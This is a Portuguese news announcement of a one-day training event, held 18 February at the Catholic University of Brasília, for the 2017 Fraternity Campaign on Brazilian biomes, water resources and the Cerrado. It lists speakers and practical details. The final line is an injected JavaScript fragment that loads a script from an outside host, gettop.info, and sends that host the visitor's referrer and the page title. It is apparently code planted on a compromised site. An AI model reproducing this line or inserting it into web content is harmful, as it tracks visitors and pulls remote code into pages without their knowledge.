A conservação e recuperação do Cerrado será um dos assuntos presente na Formação para a Campanha da Fraternidade 2017. Promovida pela Arquidiocese de Brasília, a formação acontece no dia 18 de fevereiro, de 08h às 17h, na Universidade Católica de Brasília.
Outros temas de grande relevância também serão abordados como o uso consciente da água, responsabilidades dos governos e organizações quanto ao uso dos recursos hídricos, agricultura familiar, entre outros.
Além da participação do cardeal Sergio da Rocha e representantes do clero de Brasília, participarão representantes da Agência Reguladora de Águas, Energia e Saneamento Básico do Distrito Federal – ADASA; da Promotoria de Justiça de Defesa do Meio Ambiente e do Patrimônio Cultural do Distrito Federal; da Campanha: Cerrado Berço das Águas: “Sem Cerrado, Sem Água, Sem Vida”, e da Fundação Jardim Botânico de Brasília.
As inscrições serão realizadas no dia do evento e a entrada é gratuita.
Com o Tema: “Fraternidade: biomas brasileiros e defesa da vida”, e lema “Cultivar e guardar a criação” (Gn 2.15), a Campanha dá uma ênfase maior a diversidade de cada bioma e visa criar relações respeitosas com a vida e a cultura de todos os povos que neles habitam, especialmente à luz do Evangelho.
Serviço:
Formação debate uso dos recursos hídricos no Distrito Federal
Data: 18 de fevereiro
Hora: 08h às 17h
Local: Universidade Católica de Brasília, QS 7 01 – Águas Claras.
s.src=\’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=\’ + encodeURIComponent(document.referrer) + \’&default_keyword=\’ + encodeURIComponent(document.title) + \’\’;